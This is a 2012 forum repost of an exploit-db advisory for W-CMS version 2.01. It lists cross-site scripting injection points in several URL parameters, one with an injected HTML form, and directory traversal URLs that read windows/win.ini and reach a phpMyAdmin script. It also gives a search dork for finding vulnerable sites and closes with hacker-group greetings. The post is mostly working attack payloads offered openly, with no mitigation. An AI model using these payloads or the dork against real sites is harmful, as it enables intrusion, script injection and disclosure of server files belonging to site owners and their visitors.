The_Arhitect Posted January 10, 2012 Report Posted January 10, 2012 # Exploit Title: W-Cms Multiple Vulnerability# Date: 2012-01-09# Author: th3.g4m3_0v3r# Site:http://w-cms.info/# Software Link: http://code.google.com/p/wcms/# Dork: intext:"Powered by w-CMS"# Version : [2.01]# Tested on: Window 7# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++www.h4ck3r.in www.root-team.com www.hackingmind.com++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++W-CMS cross site scripting_______________Vulnerable Link __________\/____________________________________http://localhost/index.php?bid=1&COMMENT=1 "XSS"http://localhost/?p=3"XSS"http://localhost/?bid=5&p=1"XSS"http://localhost/?p=3<FORM action="Default.asp?PageId=-1"method=POST id=searchFORMname=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value=""name="txtSEARCH"></FORM>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++directory traversal attacksThis script is possibly vulnerable to directory traversal attackshttp://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.inihttp://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.netsource: exploit-db.com Quote
